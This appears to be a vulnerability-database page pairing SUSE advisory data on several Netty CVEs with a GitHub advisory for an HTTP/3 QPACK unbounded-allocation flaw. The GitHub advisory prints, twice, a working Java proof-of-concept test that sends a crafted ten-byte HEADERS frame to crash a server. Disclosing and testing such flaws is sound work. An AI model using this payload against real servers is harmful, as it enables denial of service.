"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42585",
"url": "https://www.suse.com/security/cve/CVE-2026-42585"
},
{
"category": "external",
"summary": "SUSE Bug 1265291 for CVE-2026-42585",
"url": "https://bugzilla.suse.com/1265291"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-42585"
},
{
"cve": "CVE-2026-42586",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42586"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, the Netty Redis codec encoder (RedisEncoder) writes user-controlled string content directly to the network output buffer without validating or sanitizing CRLF (\\r\\n) characters. Since the Redis Serialization Protocol (RESP) uses CRLF as the command/response delimiter, an attacker who can control the content of a Redis message can inject arbitrary Redis commands or forge fake responses. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42586",
"url": "https://www.suse.com/security/cve/CVE-2026-42586"
},
{
"category": "external",
"summary": "SUSE Bug 1265245 for CVE-2026-42586",
"url": "https://bugzilla.suse.com/1265245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42586"
},
{
"cve": "CVE-2026-42587",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42587"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42587",
"url": "https://www.suse.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "SUSE Bug 1265246 for CVE-2026-42587",
"url": "https://bugzilla.suse.com/1265246"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42587"
},
{
"cve": "CVE-2026-44248",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44248"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, the MQTT 5 header Properties section is parsed and buffered before any message size limit is applied. Specifically, in MqttDecoder, the decodeVariableHeader() method is called before the bytesRemainingBeforeVariableHeader \u003e maxBytesInMessage check. The decodeVariableHeader() can call other methods which will call decodeProperties(). Effectively, Netty does not apply any limits to the size of the properties being decoded. Additionally, because MqttDecoder extends ReplayingDecoder, Netty will repeatedly re-parse the enormous Properties sections and buffer the bytes in memory, until the entire thing parses to completion. This can cause high resource usage in both CPU and memory. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44248",
"url": "https://www.suse.com/security/cve/CVE-2026-44248"
},
{
"category": "external",
"summary": "SUSE Bug 1265293 for CVE-2026-44248",
"url": "https://bugzilla.suse.com/1265293"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-44248"
}
]
}
GHSA-2C5C-CHWR-9HQW
Vulnerability from github – Published: 2026-05-07 00:19 – Updated: 2026-05-14 20:41
VLAI?
Summary
Netty HTTP/3 QPACK literal unbounded allocation
Details
Summary
When Netty decodes HTTP/3 headers, it sometimes runs new byte[length] using a length from the wire before checking that many bytes are really there. A small malicious header can claim a huge length (on the order of a gigabyte).
Details
When decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length <= in.readableBytes() before new byte[length].
PoC
The test below constructs a small HTTP/3 HEADERS frame whose QPACK section decodes to a ~1 GiB non-Huffman name length and is used to observe server-side failure; it illustrates how little wire data can target new byte[length].
@Test
public void test() throws Exception {
EventLoopGroup group = new MultiThreadIoEventLoopGroup(1, NioIoHandler.newFactory());
try {
X509Bundle cert = new CertificateBuilder()
.subject("cn=localhost")
.setIsCertificateAuthority(true)
.buildSelfSigned();
QuicSslContext serverContext = QuicSslContextBuilder.forServer(cert.toTempPrivateKeyPem(), null, cert.toTempCertChainPem())
.applicationProtocols(Http3.supportedApplicationProtocols())
.build();
AtomicReference<Throwable> serverErrors = new AtomicReference<>();
CountDownLatch serverConnectionClosed = new CountDownLatch(1);
ChannelHandler serverCodec = Http3.newQuicServerCodecBuilder()
.sslContext(serverContext)
.maxIdleTimeout(5000, TimeUnit.MILLISECONDS)
.initialMaxData(10_000_000)
.initialMaxStreamDataBidirectionalLocal(1_000_000)
.initialMaxStreamDataBidirectionalRemote(1_000_000)
.initialMaxStreamsBidirectional(100)
.tokenHandler(InsecureQuicTokenHandler.INSTANCE)
.handler(new ChannelInitializer<QuicChannel>() {
@Override
protected void initChannel(QuicChannel ch) {
ch.closeFuture().addListener(f -> serverConnectionClosed.countDown());
ch.pipeline().addLast(new Http3ServerConnectionHandler(
new ChannelInboundHandlerAdapter() {
@Override
public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
if (cause instanceof DecoderException) {
serverErrors.set(cause.getCause());
} else {
serverErrors.set(cause);
}
}
}));
}
})
.build();
Channel server = new Bootstrap()
.group(group)
.channel(NioDatagramChannel.class)
.handler(serverCodec)
.bind("127.0.0.1", 0)
.sync()
.channel();
QuicSslContext clientContext = QuicSslContextBuilder.forClient()
.trustManager(InsecureTrustManagerFactory.INSTANCE)
.applicationProtocols(Http3.supportedApplicationProtocols())
.build();
ChannelHandler clientCodec = Http3.newQuicClientCodecBuilder()
.sslContext(clientContext)
.maxIdleTimeout(5000, TimeUnit.MILLISECONDS)
.initialMaxData(10000000)
.initialMaxStreamDataBidirectionalLocal(1000000)
.build();
Channel client = new Bootstrap()
.group(group)
.channel(NioDatagramChannel.class)
.handler(clientCodec)
.bind(0)
.sync()
.channel();
QuicChannel quicChannel = QuicChannel.newBootstrap(client)
.handler(new Http3ClientConnectionHandler())
.remoteAddress(server.localAddress())
.localAddress(client.localAddress())
.connect()
.get();
QuicStreamChannel rawStream =
quicChannel.createStream(QuicStreamType.BIDIRECTIONAL, new ChannelInboundHandlerAdapter()).get();
ByteBuf header = Unpooled.buffer();
header.writeByte(0x01);
header.writeByte(0x08);
header.writeByte(0x00);
header.writeByte(0x00);
header.writeByte(0x27);
header.writeByte(0x80);
header.writeByte(0x80);
header.writeByte(0x80);
header.writeByte(0x80);
header.writeByte(0x04);
rawStream.writeAndFlush(header).sync();
assertTrue(serverConnectionClosed.await(10, TimeUnit.SECONDS));
assertInstanceOf(IndexOutOfBoundsException.class, serverErrors.get());
quicChannel.closeFuture().await(5, TimeUnit.SECONDS);
server.close().sync();
client.close().sync();
} finally {
group.shutdownGracefully();
}
}
Impact
The server can slow down, stall, or crash under load when many crafted HTTP/3 HEADERS frames trigger very large byte[] allocations during QPACK literal decoding.
Severity ?
7.5 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.12.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.2.13.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42582"
],
"database_specific": {
"cwe_ids": [
"CWE-770",
"CWE-789"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T00:19:21Z",
"nvd_published_at": "2026-05-13T19:17:23Z",
"severity": "HIGH"
},
"details": "### Summary\nWhen Netty decodes HTTP/3 headers, it sometimes runs `new byte[length]` using a length from the wire before checking that many bytes are really there. A small malicious header can claim a huge length (on the order of a gigabyte).\n\n### Details\nWhen decoding header blocks, the non-Huffman branch of `io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral` may execute `new byte[length]` for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that `length \u003c= in.readableBytes()` before `new byte[length]`.\n\n### PoC\nThe test below constructs a small HTTP/3 HEADERS frame whose QPACK section decodes to a ~1\u202fGiB non-Huffman name length and is used to observe server-side failure; it illustrates how little wire data can target `new byte[length]`.\n\n```java\n @Test\n public void test() throws Exception {\n EventLoopGroup group = new MultiThreadIoEventLoopGroup(1, NioIoHandler.newFactory());\n try {\n X509Bundle cert = new CertificateBuilder()\n .subject(\"cn=localhost\")\n .setIsCertificateAuthority(true)\n .buildSelfSigned();\n\n QuicSslContext serverContext = QuicSslContextBuilder.forServer(cert.toTempPrivateKeyPem(), null, cert.toTempCertChainPem())\n .applicationProtocols(Http3.supportedApplicationProtocols())\n .build();\n\n AtomicReference\u003cThrowable\u003e serverErrors = new AtomicReference\u003c\u003e();\n CountDownLatch serverConnectionClosed = new CountDownLatch(1);\n\n ChannelHandler serverCodec = Http3.newQuicServerCodecBuilder()\n .sslContext(serverContext)\n .maxIdleTimeout(5000, TimeUnit.MILLISECONDS)\n .initialMaxData(10_000_000)\n .initialMaxStreamDataBidirectionalLocal(1_000_000)\n .initialMaxStreamDataBidirectionalRemote(1_000_000)\n .initialMaxStreamsBidirectional(100)\n .tokenHandler(InsecureQuicTokenHandler.INSTANCE)\n .handler(new ChannelInitializer\u003cQuicChannel\u003e() {\n @Override\n protected void initChannel(QuicChannel ch) {\n ch.closeFuture().addListener(f -\u003e serverConnectionClosed.countDown());\n ch.pipeline().addLast(new Http3ServerConnectionHandler(\n new ChannelInboundHandlerAdapter() {\n @Override\n public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {\n if (cause instanceof DecoderException) {\n serverErrors.set(cause.getCause());\n } else {\n serverErrors.set(cause);\n }\n }\n }));\n }\n })\n .build();\n\n Channel server = new Bootstrap()\n .group(group)\n .channel(NioDatagramChannel.class)\n .handler(serverCodec)\n .bind(\"127.0.0.1\", 0)\n .sync()\n .channel();\n\n QuicSslContext clientContext = QuicSslContextBuilder.forClient()\n .trustManager(InsecureTrustManagerFactory.INSTANCE)\n .applicationProtocols(Http3.supportedApplicationProtocols())\n .build();\n\n ChannelHandler clientCodec = Http3.newQuicClientCodecBuilder()\n .sslContext(clientContext)\n .maxIdleTimeout(5000, TimeUnit.MILLISECONDS)\n .initialMaxData(10000000)\n .initialMaxStreamDataBidirectionalLocal(1000000)\n .build();\n\n Channel client = new Bootstrap()\n .group(group)\n .channel(NioDatagramChannel.class)\n .handler(clientCodec)\n .bind(0)\n .sync()\n .channel();\n\n QuicChannel quicChannel = QuicChannel.newBootstrap(client)\n .handler(new Http3ClientConnectionHandler())\n .remoteAddress(server.localAddress())\n .localAddress(client.localAddress())\n .connect()\n .get();\n\n QuicStreamChannel rawStream =\n quicChannel.createStream(QuicStreamType.BIDIRECTIONAL, new ChannelInboundHandlerAdapter()).get();\n\n ByteBuf header = Unpooled.buffer();\n header.writeByte(0x01);\n header.writeByte(0x08);\n\n header.writeByte(0x00);\n header.writeByte(0x00);\n\n header.writeByte(0x27);\n header.writeByte(0x80);\n header.writeByte(0x80);\n header.writeByte(0x80);\n header.writeByte(0x80);\n header.writeByte(0x04);\n\n rawStream.writeAndFlush(header).sync();\n\n assertTrue(serverConnectionClosed.await(10, TimeUnit.SECONDS));\n\n assertInstanceOf(IndexOutOfBoundsException.class, serverErrors.get());\n\n quicChannel.closeFuture().await(5, TimeUnit.SECONDS);\n server.close().sync();\n client.close().sync();\n } finally {\n group.shutdownGracefully();\n }\n }\n```\n\n### Impact\nThe server can slow down, stall, or crash under load when many crafted HTTP/3 HEADERS frames trigger very large `byte[]` allocations during QPACK literal decoding.",
"id": "GHSA-2c5c-chwr-9hqw",
"modified": "2026-05-14T20:41:09Z",
"published": "2026-05-07T00:19:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42582"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Netty HTTP/3 QPACK literal unbounded allocation"
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…